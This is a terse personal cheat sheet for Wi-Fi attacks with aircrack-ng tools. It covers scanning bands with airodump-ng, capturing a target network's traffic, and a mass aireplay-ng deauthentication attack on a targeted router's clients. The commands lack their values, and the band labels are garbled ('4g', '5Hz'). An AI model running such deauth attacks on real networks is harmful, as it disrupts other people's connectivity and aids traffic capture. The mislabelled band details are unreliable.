after activating monitor mode airodump-ng --band abg will search for all 5g and 4g networks airodump-ng wlan0 for only 4g or 2.4Hz networks airodump-ng --band a for 5g or 5Hz networks airodump-ng --bssid --channel --write to start collecting data ^c to stop wireshark to elaborate the cap file on opening aireplay-ng --deauth 1000000 -a -c will start deauth attacks client mac can be any one of the several clients connected to the router we targeted.